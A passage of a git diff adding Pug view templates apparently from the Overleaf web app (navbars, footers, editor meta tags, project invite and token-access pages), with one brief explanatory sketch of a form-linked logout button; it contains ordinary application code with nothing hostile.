false + } + + if showNavItem + if item.dropdown + +nav-item.dropdown(class=item.class) + button.dropdown-toggle( + aria-haspopup="true", + aria-expanded="false", + data-bs-toggle="dropdown" + role="menuitem" + event-tracking="menu-expand" + event-tracking-mb="true" + event-tracking-trigger="click" + event-segmentation={"item": item.trackingKey, "location": "top-menu"} + ) + | !{translate(item.text)} + span.caret + +dropdown-menu.dropdown-menu-end + each child in item.dropdown + if child.divider + +dropdown-menu-divider + else if child.isContactUs + +dropdown-menu-link-item()(data-ol-open-contact-form-modal="contact-us" data-bs-target="#contactUsModal" href data-bs-toggle="modal" event-tracking="menu-click" event-tracking-mb="true" event-tracking-trigger="click" event-segmentation={"item": "contact", "location": "top-menu"}) + span + | #{translate("contact_us")} + else + if child.url + +dropdown-menu-link-item()( + href=child.url, + class=child.class, + event-tracking="menu-click" + event-tracking-mb="true" + event-tracking-trigger="click" + event-segmentation={ item: child.trackingKey, location: 'top-menu' } + ) !{translate(child.text)} + else + +dropdown-menu-item !{translate(child.text)} + 
else + +nav-item(class=item.class) + if item.url + +nav-link( + href=item.url, + class=item.class, + event-tracking="menu-click" + event-tracking-mb="true" + event-tracking-trigger="click" + event-segmentation={ item: item.trackingKey, location: 'top-menu' } + ) !{translate(item.text)} + else + | !{translate(item.text)} + + // logged out + if !getSessionUser() + // register link + if hasFeature('registration-page') + +nav-item.primary + +nav-link( + href="/register" + event-tracking="menu-click" + event-tracking-action="clicked" + event-tracking-trigger="click" + event-tracking-mb="true" + event-segmentation={ page: currentUrl, item: 'register', location: 'top-menu' } + ) #{translate('sign_up')} + + // login link + +nav-item + +nav-link( + href="/login" + event-tracking="menu-click" + event-tracking-action="clicked" + event-tracking-trigger="click" + event-tracking-mb="true" + event-segmentation={ page: currentUrl, item: 'login', location: 'top-menu' } + ) #{translate('log_in')} + + // projects link and account menu + if getSessionUser() + +nav-item + +nav-link(href="/project") #{translate('Projects')} + +nav-item.dropdown + button.dropdown-toggle( + aria-haspopup="true", + aria-expanded="false", + data-bs-toggle="dropdown" + role="menuitem" + event-tracking="menu-expand" + event-tracking-mb="true" + event-tracking-trigger="click" + event-segmentation={"item": "account", "location": "top-menu"} + ) + | #{translate('Account')} + span.caret + +dropdown-menu.dropdown-menu-end + +dropdown-menu-item + div.disabled.dropdown-item #{getSessionUser().email} + +dropdown-menu-divider + +dropdown-menu-link-item()(href="/user/settings") #{translate('Account Settings')} + if nav.showSubscriptionLink + +dropdown-menu-link-item()(href="/user/subscription") #{translate('subscription')} + +dropdown-menu-divider + +dropdown-menu-item + //- + The button is outside the form but still belongs to it via the form attribute. The reason to do + this is that if the button is inside the form, screen readers will not count it in the total + number of menu items. 
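For reference, the association that comment describes, reduced to a minimal Pug sketch (the id and classes here are illustrative, not part of the patch): the submit button lives outside the form element but still submits it through the matching form="…"/id pair, so a menu wrapping the button keeps an accurate item count for screen readers. //- sketch: a submit button outside its form, linked via the form attribute ul.dropdown-menu(role="menu")   li(role="none")     button.dropdown-item(type="submit" role="menuitem" form="exampleLogOutForm") Log out form#exampleLogOutForm(method="POST" action="/logout")   input(name="_csrf" type="hidden" value=csrfToken)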
+ button.btn-link.text-left.dropdown-menu-button.dropdown-item( + role="menuitem", + tabindex="-1" + form="logOutForm" + ) + | #{translate('log_out')} + form( + method="POST", + action="/logout", + id="logOutForm" + ) + input(name='_csrf', type='hidden', value=csrfToken) diff --git a/services/web/app/views/layout/navbar-marketing-react-bootstrap-5.pug b/services/web/app/views/layout/navbar-marketing-react-bootstrap-5.pug new file mode 100644 index 0000000..ee0fcd2 --- /dev/null +++ b/services/web/app/views/layout/navbar-marketing-react-bootstrap-5.pug @@ -0,0 +1 @@ +#navbar-container diff --git a/services/web/app/views/layout/navbar-marketing.pug b/services/web/app/views/layout/navbar-marketing.pug new file mode 100644 index 0000000..e0f3600 --- /dev/null +++ b/services/web/app/views/layout/navbar-marketing.pug @@ -0,0 +1,197 @@ +nav.navbar.navbar-default.navbar-main(class={ + 'website-redesign-navbar': isWebsiteRedesign +}) + .container-fluid + .navbar-header + if (typeof(suppressNavbarRight) == "undefined") + button.navbar-toggle.collapsed( + type="button", + data-toggle="collapse", + data-target="#navbar-main-collapse" + aria-label="Toggle " + translate('navigation') + ) + i.fa.fa-bars(aria-hidden="true") + - var enableUpgradeButton = projectDashboardReact && usersBestSubscription && (usersBestSubscription.type === 'free' || usersBestSubscription.type === 'standalone-ai-add-on') + if (enableUpgradeButton) + a.btn.btn-primary.pull-right.me-2.visible-xs( + href="/user/subscription/plans" + event-tracking="upgrade-button-click" + event-tracking-mb="true" + event-tracking-label="upgrade" + event-tracking-trigger="click" + event-segmentation='{"source": "dashboard-top", "project-dashboard-react": "enabled", "is-dashboard-sidebar-hidden": "true", "is-screen-width-less-than-768px": "true"}' + ) #{translate("upgrade")} + if settings.nav.custom_logo + a(href='/', aria-label=settings.appName, style='background-image:url("'+settings.nav.custom_logo+'")').navbar-brand + else if (nav.title) + a(href='/', aria-label=settings.appName).navbar-title #{nav.title} + else + a(href='/', aria-label=settings.appName).navbar-brand + + - var canDisplayAdminMenu = hasAdminAccess() + - var canDisplayAdminRedirect = canRedirectToAdminDomain() + - var canDisplaySplitTestMenu = hasFeature('saas') && (canDisplayAdminMenu || (getSessionUser() && getSessionUser().staffAccess && (getSessionUser().staffAccess.splitTestMetrics || getSessionUser().staffAccess.splitTestManagement))) + - var canDisplaySurveyMenu = hasFeature('saas') && canDisplayAdminMenu + - var canDisplayScriptLogMenu = hasFeature('saas') && canDisplayAdminMenu + + if (typeof(suppressNavbarRight) == "undefined") + .navbar-collapse.collapse#navbar-main-collapse + ul.nav.navbar-nav.navbar-right + if (canDisplayAdminMenu || canDisplayAdminRedirect || canDisplaySplitTestMenu) + li.dropdown.subdued + a.dropdown-toggle( + href="#", + role="button", + aria-haspopup="true", + aria-expanded="false", + data-toggle="dropdown" + event-tracking="menu-expand" + event-tracking-mb="true" + event-tracking-trigger="click" + event-segmentation={"item": "admin", "location": "top-menu"} + ) + | Admin + span.caret + ul.dropdown-menu + if canDisplayAdminMenu + li + a(href="/admin") Manage Site + li + a(href="/admin/user") Manage Users + li + a(href="/admin/project") Project URL Lookup + if canDisplayAdminRedirect + li + a(href=settings.adminUrl) Switch to Admin + if canDisplaySplitTestMenu + li + a(href="/admin/split-test") Manage Feature Flags + if canDisplaySurveyMenu + li + 
a(href="/admin/survey") Manage Surveys + if canDisplayScriptLogMenu + li + a(href="/admin/script-logs") View Script Logs + + // loop over header_extras + each item in nav.header_extras + - + if ((item.only_when_logged_in && getSessionUser()) + || (item.only_when_logged_out && (!getSessionUser())) + || (!item.only_when_logged_out && !item.only_when_logged_in && !item.only_content_pages) + || (item.only_content_pages && (typeof(suppressNavContentLinks) == "undefined" || !suppressNavContentLinks)) + ){ + var showNavItem = true + } else { + var showNavItem = false + } + + if showNavItem + if item.dropdown + li.dropdown(class=item.class) + a.dropdown-toggle( + href="#", + role="button", + aria-haspopup="true", + aria-expanded="false", + data-toggle="dropdown" + event-tracking="menu-expand" + event-tracking-mb="true" + event-tracking-trigger="click" + event-segmentation={"item": item.trackingKey, "location": "top-menu"} + ) + | !{translate(item.text)} + span.caret + ul.dropdown-menu + each child in item.dropdown + if child.divider + li.divider + else if child.isContactUs + li + a(data-ol-open-contact-form-modal="contact-us" href event-tracking="menu-click" event-tracking-mb="true" event-tracking-trigger="click" event-segmentation={"item": "contact", "location": "top-menu"}) + span + | #{translate("contact_us")} + else + li + if child.url + a( + href=child.url, + class=child.class, + event-tracking="menu-click" + event-tracking-mb="true" + event-tracking-trigger="click" + event-segmentation={item: item.trackingKey, location: 'top-menu'} + ) !{translate(child.text)} + else + | !{translate(child.text)} + else + li(class=item.class) + if item.url + a( + href=item.url, + class=item.class, + event-tracking="menu-click" + event-tracking-mb="true" + event-tracking-trigger="click" + event-segmentation={ item: item.trackingKey, location: 'top-menu' } + ) !{translate(item.text)} + else + | !{translate(item.text)} + + // logged out + if !getSessionUser() + // register link + if hasFeature('registration-page') + li.primary + a( + href="/register" + event-tracking="menu-click" + event-tracking-action="clicked" + event-tracking-trigger="click" + event-tracking-mb="true" + event-segmentation={ page: currentUrl, item: 'register', location: 'top-menu' } + ) #{translate('sign_up')} + + // login link + li + a( + href="/login" + event-tracking="menu-click" + event-tracking-action="clicked" + event-tracking-trigger="click" + event-tracking-mb="true" + event-segmentation={ page: currentUrl, item: 'login', location: 'top-menu' } + ) #{translate('log_in')} + + // projects link and account menu + if getSessionUser() + li + a(href="/project") #{translate('Projects')} + li.dropdown + a.dropdown-toggle( + href="#", + role="button", + aria-haspopup="true", + aria-expanded="false", + data-toggle="dropdown" + event-tracking="menu-expand" + event-tracking-mb="true" + event-tracking-trigger="click" + event-segmentation={"item": "account", "location": "top-menu"} + ) + | #{translate('Account')} + span.caret + ul.dropdown-menu + li + div.subdued #{getSessionUser().email} + li.divider.hidden-xs.hidden-sm + li + a(href="/user/settings") #{translate('Account Settings')} + if nav.showSubscriptionLink + li + a(href="/user/subscription") #{translate('subscription')} + li.divider.hidden-xs.hidden-sm + li + form(method="POST" action="/logout") + input(name='_csrf', type='hidden', value=csrfToken) + button.btn-link.text-left.dropdown-menu-button #{translate('log_out')} diff --git a/services/web/app/views/layout/navbar-website-redesign.pug 
b/services/web/app/views/layout/navbar-website-redesign.pug new file mode 100644 index 0000000..c4b712e --- /dev/null +++ b/services/web/app/views/layout/navbar-website-redesign.pug @@ -0,0 +1,195 @@ +nav.navbar.navbar-default.navbar-main.website-redesign-navbar + .container-fluid + .navbar-header + if (typeof(suppressNavbarRight) == "undefined") + button.navbar-toggle.collapsed( + type="button", + data-toggle="collapse", + data-target="#navbar-main-collapse" + aria-label="Toggle " + translate('navigation') + ) + i.fa.fa-bars(aria-hidden="true") + - var enableUpgradeButton = projectDashboardReact && usersBestSubscription && (usersBestSubscription.type === 'free' || usersBestSubscription.type === 'standalone-ai-add-on') + if (enableUpgradeButton) + a.btn.btn-primary.pull-right.me-2.visible-xs( + href="/user/subscription/plans" + event-tracking="upgrade-button-click" + event-tracking-mb="true" + event-tracking-label="upgrade" + event-tracking-trigger="click" + event-segmentation='{"source": "dashboard-top", "project-dashboard-react": "enabled", "is-dashboard-sidebar-hidden": "true", "is-screen-width-less-than-768px": "true"}' + ) #{translate("upgrade")} + if settings.nav.custom_logo + a(href='/', aria-label=settings.appName, style='background-image:url("'+settings.nav.custom_logo+'")').navbar-brand + else if (nav.title) + a(href='/', aria-label=settings.appName).navbar-title #{nav.title} + else + a(href='/', aria-label=settings.appName).navbar-brand + + - var canDisplayAdminMenu = hasAdminAccess() + - var canDisplayAdminRedirect = canRedirectToAdminDomain() + - var canDisplaySplitTestMenu = hasFeature('saas') && (canDisplayAdminMenu || (getSessionUser() && getSessionUser().staffAccess && (getSessionUser().staffAccess.splitTestMetrics || getSessionUser().staffAccess.splitTestManagement))) + - var canDisplaySurveyMenu = hasFeature('saas') && canDisplayAdminMenu + - var canDisplayScriptLogMenu = hasFeature('saas') && canDisplayAdminMenu + + if (typeof(suppressNavbarRight) == "undefined") + .navbar-collapse.collapse#navbar-main-collapse + ul.nav.navbar-nav.navbar-right + if (canDisplayAdminMenu || canDisplayAdminRedirect || canDisplaySplitTestMenu) + li.dropdown.subdued + a.dropdown-toggle( + href="#", + role="button", + aria-haspopup="true", + aria-expanded="false", + data-toggle="dropdown" + event-tracking="menu-expand" + event-tracking-mb="true" + event-tracking-trigger="click" + event-segmentation={"item": "admin", "location": "top-menu"} + ) + | Admin + span.caret + ul.dropdown-menu + if canDisplayAdminMenu + li + a(href="/admin") Manage Site + li + a(href="/admin/user") Manage Users + li + a(href="/admin/project") Project URL Lookup + if canDisplayAdminRedirect + li + a(href=settings.adminUrl) Switch to Admin + if canDisplaySplitTestMenu + li + a(href="/admin/split-test") Manage Feature Flags + if canDisplaySurveyMenu + li + a(href="/admin/survey") Manage Surveys + if canDisplayScriptLogMenu + li + a(href="/admin/script-logs") View Script Logs + + // loop over header_extras + each item in nav.header_extras + - + if ((item.only_when_logged_in && getSessionUser()) + || (item.only_when_logged_out && (!getSessionUser())) + || (!item.only_when_logged_out && !item.only_when_logged_in && !item.only_content_pages) + || (item.only_content_pages && (typeof(suppressNavContentLinks) == "undefined" || !suppressNavContentLinks)) + ){ + var showNavItem = true + } else { + var showNavItem = false + } + + if showNavItem + if item.dropdown + li.dropdown(class=item.class) + a.dropdown-toggle( + href="#", + 
role="button", + aria-haspopup="true", + aria-expanded="false", + data-toggle="dropdown" + event-tracking="menu-expand" + event-tracking-mb="true" + event-tracking-trigger="click" + event-segmentation={"item": item.trackingKey, "location": "top-menu"} + ) + | !{translate(item.text)} + span.caret + ul.dropdown-menu + each child in item.dropdown + if child.divider + li.divider + else if child.isContactUs + li + a(data-ol-open-contact-form-modal="contact-us" href event-tracking="menu-click" event-tracking-mb="true" event-tracking-trigger="click" event-segmentation={"item": "contact", "location": "top-menu"}) + span + | #{translate("contact_us")} + else + li + if child.url + a( + href=child.url, + class=child.class, + event-tracking="menu-click" + event-tracking-mb="true" + event-tracking-trigger="click" + event-segmentation={item: child.trackingKey, location: 'top-menu'} + ) !{translate(child.text)} + else + | !{translate(child.text)} + else + li(class=item.class) + if item.url + a( + href=item.url, + class=item.class, + event-tracking="menu-click" + event-tracking-mb="true" + event-tracking-trigger="click" + event-segmentation={ item: item.trackingKey, location: 'top-menu' } + ) !{translate(item.text)} + else + | !{translate(item.text)} + + // logged out + if !getSessionUser() + // register link + if hasFeature('registration-page') + li.primary + a( + href="/register" + event-tracking="menu-click" + event-tracking-action="clicked" + event-tracking-trigger="click" + event-tracking-mb="true" + event-segmentation={ page: currentUrl, item: 'register', location: 'top-menu' } + ) #{translate('sign_up')} + + // login link + li.secondary + a( + href="/login" + event-tracking="menu-click" + event-tracking-action="clicked" + event-tracking-trigger="click" + event-tracking-mb="true" + event-segmentation={ page: currentUrl, item: 'login', location: 'top-menu' } + ) #{translate('log_in')} + + // projects link and account menu + if getSessionUser() + li.secondary + a(href="/project") #{translate('Projects')} + li.secondary.dropdown + a.dropdown-toggle( + href="#", + role="button", + aria-haspopup="true", + aria-expanded="false", + data-toggle="dropdown" + event-tracking="menu-expand" + event-tracking-mb="true" + event-tracking-trigger="click" + event-segmentation={"item": "account", "location": "top-menu"} + ) + | #{translate('Account')} + span.caret + ul.dropdown-menu + li + div.subdued #{getSessionUser().email} + li.divider.hidden-xs.hidden-sm + li + a(href="/user/settings") #{translate('Account Settings')} + if nav.showSubscriptionLink + li + a(href="/user/subscription") #{translate('subscription')} + li.divider.hidden-xs.hidden-sm + li + form(method="POST" action="/logout") + input(name='_csrf', type='hidden', value=csrfToken) + button.btn-link.text-left.dropdown-menu-button #{translate('log_out')} diff --git a/services/web/app/views/layout/thin-footer-bootstrap-5.pug b/services/web/app/views/layout/thin-footer-bootstrap-5.pug new file mode 100644 index 0000000..1f06a05 --- /dev/null +++ b/services/web/app/views/layout/thin-footer-bootstrap-5.pug @@ -0,0 +1,38 @@ +footer.site-footer + - var showLanguagePicker = Object.keys(settings.i18n.subdomainLang).length > 1 + - var hasCustomLeftNav = nav.left_footer && nav.left_footer.length > 0 + .site-footer-content.hidden-print + .row + ul.site-footer-items.col-lg-9 + if !settings.nav.hide_powered_by + li + //- year of Server Pro release, static + | © 2025 + | + a(href='https://www.overleaf.com/for/enterprises') Powered by Overleaf + + if showLanguagePicker || 
hasCustomLeftNav + li + strong.text-muted | + + if showLanguagePicker + include language-picker-bootstrap-5 + + if showLanguagePicker && hasCustomLeftNav + li + strong.text-muted | + + each item in nav.left_footer + li + if item.url + a(href=item.url, class=item.class) !{translate(item.text)} + else + | !{item.text} + + ul.site-footer-items.col-lg-3.text-end + each item in nav.right_footer + li + if item.url + a(href=item.url, class=item.class, aria-label=item.label) !{item.text} + else + | !{item.text} diff --git a/services/web/app/views/layout/thin-footer.pug b/services/web/app/views/layout/thin-footer.pug new file mode 100644 index 0000000..6eeecf6 --- /dev/null +++ b/services/web/app/views/layout/thin-footer.pug @@ -0,0 +1,40 @@ +footer.site-footer + - var showLanguagePicker = Object.keys(settings.i18n.subdomainLang).length > 1 + - var hasCustomLeftNav = nav.left_footer && nav.left_footer.length > 0 + .site-footer-content.hidden-print + .row + ul.col-md-9 + if hasFeature('saas') + li © #{new Date().getFullYear()} Overleaf + else if !settings.nav.hide_powered_by + li + //- year of Server Pro release, static + | © 2025 + | + a(href='https://www.overleaf.com/for/enterprises') Powered by Overleaf + + if showLanguagePicker || hasCustomLeftNav + li + strong.text-muted | + + if showLanguagePicker + include language-picker + + if showLanguagePicker && hasCustomLeftNav + li + strong.text-muted | + + each item in nav.left_footer + li + if item.url + a(href=item.url, class=item.class) !{translate(item.text)} + else + | !{item.text} + + ul.col-md-3.text-right + each item in nav.right_footer + li + if item.url + a(href=item.url, class=item.class, aria-label=item.label) !{item.text} + else + | !{item.text} diff --git a/services/web/app/views/project/editor/_meta.pug b/services/web/app/views/project/editor/_meta.pug new file mode 100644 index 0000000..61b7dd7 --- /dev/null +++ b/services/web/app/views/project/editor/_meta.pug @@ -0,0 +1,61 @@ +meta(name="ol-project_id" content=project_id) +meta(name="ol-projectName" content=projectName) +meta(name="ol-userSettings" data-type="json" content=userSettings) +meta(name="ol-user" data-type="json" content=user) +meta(name="ol-labsExperiments" data-type="json" content=labsExperiments) +meta(name="ol-learnedWords" data-type="json" content=learnedWords) +meta(name="ol-anonymous" data-type="boolean" content=anonymous) +meta(name="ol-brandVariation" data-type="json" content=brandVariation) +meta(name="ol-isTokenMember" data-type="boolean" content=isTokenMember) +meta(name="ol-isRestrictedTokenMember" data-type="boolean" content=isRestrictedTokenMember) +meta(name="ol-maxDocLength" data-type="json" content=maxDocLength) +meta(name="ol-maxReconnectGracefullyIntervalMs" data-type="json" content=maxReconnectGracefullyIntervalMs) +meta(name="ol-wikiEnabled" data-type="boolean" content=settings.proxyLearn) +meta(name="ol-chatEnabled" data-type="boolean" content=chatEnabled) +meta(name="ol-projectHistoryBlobsEnabled" data-type="boolean" content=projectHistoryBlobsEnabled) +meta(name="ol-gitBridgePublicBaseUrl" content=gitBridgePublicBaseUrl) +meta(name="ol-gitBridgeEnabled" data-type="boolean" content=gitBridgeEnabled) +meta(name="ol-compilesUserContentDomain" content=settings.compilesUserContentDomain) +//- enable doc hash checking for all projects +//- used in public/js/libs/sharejs.js +meta(name="ol-useShareJsHash" data-type="boolean" content=true) +meta(name="ol-wsUrl" data-type="string" content=wsUrl) +meta(name="ol-wsRetryHandshake" data-type="json" 
content=settings.wsRetryHandshake) +meta(name="ol-debugPdfDetach" data-type="boolean" content=debugPdfDetach) +meta(name="ol-showSymbolPalette" data-type="boolean" content=showSymbolPalette) +meta(name="ol-symbolPaletteAvailable" data-type="boolean" content=symbolPaletteAvailable) +meta(name="ol-showAiErrorAssistant" data-type="boolean" content=showAiErrorAssistant) +meta(name="ol-detachRole" data-type="string" content=detachRole) +meta(name="ol-allowedImageNames" data-type="json" content=allowedImageNames) +meta(name="ol-languages" data-type="json" content=languages) +meta(name="ol-editorThemes" data-type="json" content=editorThemes) +meta(name="ol-legacyEditorThemes" data-type="json" content=legacyEditorThemes) +meta(name="ol-showUpgradePrompt" data-type="boolean" content=showUpgradePrompt) +meta(name="ol-showSupport", data-type="boolean" content=showSupport) +meta(name="ol-showTemplatesServerPro", data-type="boolean" content=showTemplatesServerPro) +meta(name="ol-hasTrackChangesFeature", data-type="boolean" content=hasTrackChangesFeature) +meta(name="ol-inactiveTutorials", data-type="json" content=user.inactiveTutorials) +meta(name="ol-projectTags" data-type="json" content=projectTags) +meta(name="ol-ro-mirror-on-client-no-local-storage" data-type="boolean" content=roMirrorOnClientNoLocalStorage) +meta(name="ol-isSaas" data-type="boolean" content=isSaas) +meta(name="ol-shouldLoadHotjar" data-type="boolean" content=shouldLoadHotjar) +meta(name="ol-isReviewerRoleEnabled" data-type="boolean" content=isReviewerRoleEnabled) +meta(name="ol-odcRole" data-type="string" content=odcRole) +meta(name="ol-isPaywallChangeCompileTimeoutEnabled" data-type="boolean" content=isPaywallChangeCompileTimeoutEnabled) +meta(name='ol-customerIoEnabled' data-type="boolean" content=customerIoEnabled) +if(isPaywallChangeCompileTimeoutEnabled) + //- expose plans info to show prices in paywall-change-compile-timeout test + meta(name="ol-paywallPlans", data-type="json" content=paywallPlans) +if(isOverleafAssistBundleEnabled) + //- expose add-on prices to show prices in the overleaf-assist-bundle test + meta(name="ol-addonPrices", data-type="json" content=addonPrices) +// translations for the loading page, before i18n has loaded in the client +meta(name="ol-loadingText", data-type="string" content=translate("loading")) +meta(name="ol-translationIoNotLoaded", data-type="string" content=translate("could_not_connect_to_websocket_server")) +meta(name="ol-translationLoadErrorMessage", data-type="string" content=translate("could_not_load_translations")) +meta(name="ol-translationUnableToJoin", data-type="string" content=translate("could_not_connect_to_collaboration_server")) + +if (settings.overleaf != null) + meta(name="ol-overallThemes" data-type="json" content=overallThemes) + +!= moduleIncludes("editor:meta", locals) diff --git a/services/web/app/views/project/editor/new_from_template.pug b/services/web/app/views/project/editor/new_from_template.pug new file mode 100644 index 0000000..c3b40ce --- /dev/null +++ b/services/web/app/views/project/editor/new_from_template.pug @@ -0,0 +1,37 @@ +extends ../../layout-marketing + +block vars + - var suppressFooter = true + - var suppressCookieBanner = true + - var suppressSkipToContent = true + - bootstrap5PageStatus = 'disabled' + +block content + .editor.full-size + .loading-screen() + .loading-screen-brand-container + .loading-screen-brand( + style="height: 20%;" + ) + + h3.loading-screen-label() #{translate("Opening template")} + span.loading-screen-ellip .
+ span.loading-screen-ellip . + span.loading-screen-ellip . + + form( + data-ol-regular-form + data-ol-auto-submit + method='POST' + action='/project/new/template/' + ) + input(type="hidden", name="_csrf", value=csrfToken) + input(type="hidden" name="templateId" value=templateId) + input(type="hidden" name="templateVersionId" value=templateVersionId) + input(type="hidden" name="templateName" value=name) + input(type="hidden" name="compiler" value=compiler) + input(type="hidden" name="imageName" value=imageName) + input(type="hidden" name="mainFile" value=mainFile) + if brandVariationId + input(type="hidden" name="brandVariationId" value=brandVariationId) + input(hidden type="submit") diff --git a/services/web/app/views/project/editor/socket_diagnostics.pug b/services/web/app/views/project/editor/socket_diagnostics.pug new file mode 100644 index 0000000..6876e7e --- /dev/null +++ b/services/web/app/views/project/editor/socket_diagnostics.pug @@ -0,0 +1,17 @@ +extends ../../layout-marketing + +block vars + - var suppressNavbar = true + - var suppressFooter = true + - var suppressGoogleAnalytics = true + - isWebsiteRedesign = 'true' + +block entrypointVar + - entrypoint = 'pages/socket-diagnostics' + +block content + main.content.content-alt#main-content + #socket-diagnostics + +block prepend foot-scripts + script(type="text/javascript", nonce=scriptNonce, src=(wsUrl || '/socket.io') + '/socket.io.js', defer=deferScripts) diff --git a/services/web/app/views/project/ide-react-detached.pug b/services/web/app/views/project/ide-react-detached.pug new file mode 100644 index 0000000..8109da7 --- /dev/null +++ b/services/web/app/views/project/ide-react-detached.pug @@ -0,0 +1,17 @@ +extends ../layout-react + +block entrypointVar + - entrypoint = 'ide-detached' + +block vars + - var suppressNavbar = true + - var suppressFooter = true + - var suppressSkipToContent = true + - var suppressCookieBanner = true + - metadata.robotsNoindexNofollow = true + +block content + #pdf-preview-detached-root() + +block append meta + include editor/_meta diff --git a/services/web/app/views/project/ide-react.pug b/services/web/app/views/project/ide-react.pug new file mode 100644 index 0000000..bc30f69 --- /dev/null +++ b/services/web/app/views/project/ide-react.pug @@ -0,0 +1,28 @@ +extends ../layout-react + +block vars + - var suppressNavbar = true + - var suppressFooter = true + - var suppressSkipToContent = true + - var deferScripts = true + - metadata.robotsNoindexNofollow = true + - enableIeeeBranding = false + +block entrypointVar + - entrypoint = 'pages/ide' + +block content + main#ide-root + .loading-screen + .loading-screen-brand-container + .loading-screen-brand(style="height: 20%;") + h3.loading-screen-label #{translate("loading")} + span.loading-screen-ellip . + span.loading-screen-ellip . + span.loading-screen-ellip . 
+ +block append meta + include editor/_meta + +block prepend foot-scripts + script(type="text/javascript", nonce=scriptNonce, src=(wsUrl || '/socket.io') + '/socket.io.js', defer=deferScripts) diff --git a/services/web/app/views/project/invite/not-valid.pug b/services/web/app/views/project/invite/not-valid.pug new file mode 100644 index 0000000..ac3eaed --- /dev/null +++ b/services/web/app/views/project/invite/not-valid.pug @@ -0,0 +1,21 @@ +extends ../../layout-marketing + +block vars + - bootstrap5PageStatus = 'disabled' + +block content + main.content.content-alt#main-content + .container + .row + .col-md-8.col-md-offset-2 + .card.project-invite-invalid + .page-header.text-centered + h1 #{translate("invite_not_valid")} + .row.text-center + .col-md-12 + p + | #{translate("invite_not_valid_description")}. + .row.text-center.actions + .col-md-12 + a.btn.btn-secondary-info.btn-secondary(href="/project") #{translate("back_to_your_projects")} + diff --git a/services/web/app/views/project/invite/show.pug b/services/web/app/views/project/invite/show.pug new file mode 100644 index 0000000..8d19a1e --- /dev/null +++ b/services/web/app/views/project/invite/show.pug @@ -0,0 +1,37 @@ +extends ../../layout-marketing + +block vars + - bootstrap5PageStatus = 'disabled' + +block content + main.content.content-alt#main-content + .container + .row + .col-md-8.col-md-offset-2 + .card.project-invite-accept + .page-header.text-centered + h1 #{translate("user_wants_you_to_see_project", {username:owner.first_name, projectname:""})} + br + em #{project.name} + .row.text-center + .col-md-12 + p + | #{translate("accepting_invite_as")}  + em #{user.email} + .row + .col-md-12 + form.form( + data-ol-regular-form + method="POST", + action="/project/"+invite.projectId+"/invite/token/"+token+"/accept" + ) + input(name='_csrf', type='hidden', value=csrfToken) + input(name='token', type='hidden', value=token) + .form-group.text-center + button.btn.btn-lg.btn-primary( + type="submit" + data-ol-disabled-inflight + ) + span(data-ol-inflight="idle") #{translate("join_project")} + span(hidden data-ol-inflight="pending") #{translate("joining")}… + .form-group.text-center diff --git a/services/web/app/views/project/list-react.pug b/services/web/app/views/project/list-react.pug new file mode 100644 index 0000000..be9233e --- /dev/null +++ b/services/web/app/views/project/list-react.pug @@ -0,0 +1,43 @@ +extends ../layout-react + +block entrypointVar + - entrypoint = 'pages/project-list' + +block vars + - const suppressNavContentLinks = true + - const suppressNavbar = true + - const suppressFooter = true + +block append meta + meta(name="ol-usersBestSubscription" data-type="json" content=usersBestSubscription) + meta(name="ol-notifications" data-type="json" content=notifications) + meta(name="ol-notificationsInstitution" data-type="json" content=notificationsInstitution) + meta(name="ol-userEmails" data-type="json" content=userEmails) + meta(name="ol-allInReconfirmNotificationPeriods" data-type="json" content=allInReconfirmNotificationPeriods) + meta(name="ol-user" data-type="json" content=user) + meta(name="ol-userAffiliations" data-type="json" content=userAffiliations) + meta(name="ol-reconfirmedViaSAML" content=reconfirmedViaSAML) + meta(name="ol-survey" data-type="json" content=survey) + meta(name="ol-tags" data-type="json" content=tags) + meta(name="ol-portalTemplates" data-type="json" content=portalTemplates) + meta(name="ol-prefetchedProjectsBlob" data-type="json" content=prefetchedProjectsBlob) + if 
(suggestedLanguageSubdomainConfig) + meta(name="ol-suggestedLanguage" data-type="json" content=Object.assign(suggestedLanguageSubdomainConfig, { + lngName: translate(suggestedLanguageSubdomainConfig.lngCode), + imgUrl: buildImgPath("flags/24/" + suggestedLanguageSubdomainConfig.lngCode + ".png") + })) + meta(name="ol-currentUrl" data-type="string" content=currentUrl) + meta(name="ol-showGroupsAndEnterpriseBanner" data-type="boolean" content=showGroupsAndEnterpriseBanner) + meta(name="ol-groupsAndEnterpriseBannerVariant" data-type="string" content=groupsAndEnterpriseBannerVariant) + meta(name="ol-showInrGeoBanner" data-type="boolean" content=showInrGeoBanner) + meta(name="ol-showBrlGeoBanner" data-type="boolean" content=showBrlGeoBanner) + meta(name="ol-recommendedCurrency" data-type="string" content=recommendedCurrency) + meta(name="ol-showLATAMBanner" data-type="boolean" content=showLATAMBanner) + meta(name="ol-groupSubscriptionsPendingEnrollment" data-type="json" content=groupSubscriptionsPendingEnrollment) + meta(name="ol-hasIndividualRecurlySubscription" data-type="boolean" content=hasIndividualRecurlySubscription) + meta(name="ol-groupSsoSetupSuccess" data-type="boolean" content=groupSsoSetupSuccess) + meta(name="ol-showUSGovBanner" data-type="boolean" content=showUSGovBanner) + meta(name="ol-usGovBannerVariant" data-type="string" content=usGovBannerVariant) + +block content + #project-list-root diff --git a/services/web/app/views/project/token/access-react.pug b/services/web/app/views/project/token/access-react.pug new file mode 100644 index 0000000..83e9f79 --- /dev/null +++ b/services/web/app/views/project/token/access-react.pug @@ -0,0 +1,17 @@ +extends ../../layout-marketing + +block entrypointVar + - entrypoint = 'pages/token-access' + +block vars + - var suppressFooter = true + - var suppressCookieBanner = true + - var suppressSkipToContent = true + +block append meta + meta(name="ol-postUrl" data-type="string" content=postUrl) + meta(name="ol-user" data-type="json" content=user) + +block content + .content.content-alt#main-content + div#token-access-page diff --git a/services/web/app/views/project/token/sharing-updates.pug b/services/web/app/views/project/token/sharing-updates.pug new file mode 100644 index 0000000..a0afb0c --- /dev/null +++ b/services/web/app/views/project/token/sharing-updates.pug @@ -0,0 +1,16 @@ +extends ../../layout-marketing + +block entrypointVar + - entrypoint = 'pages/sharing-updates' + +block vars + - var suppressFooter = true + - var suppressCookieBanner = true + - var suppressSkipToContent = true + +block append meta + meta(name="ol-project_id" data-type="string" content=projectId) + +block content + .content.content-alt#main-content + div#sharing-updates-page diff --git a/services/web/app/views/referal/bonus.pug b/services/web/app/views/referal/bonus.pug new file mode 100644 index 0000000..ecd5a71 --- /dev/null +++ b/services/web/app/views/referal/bonus.pug @@ -0,0 +1,49 @@ +extends ../layout-marketing + +block vars + - bootstrap5PageStatus = 'disabled' + +block content + .content.content-alt#main-content + .container.bonus + .row + .col-md-8.col-md-offset-2 + .card + .container-fluid + .row + .col-md-10.col-md-offset-1 + if 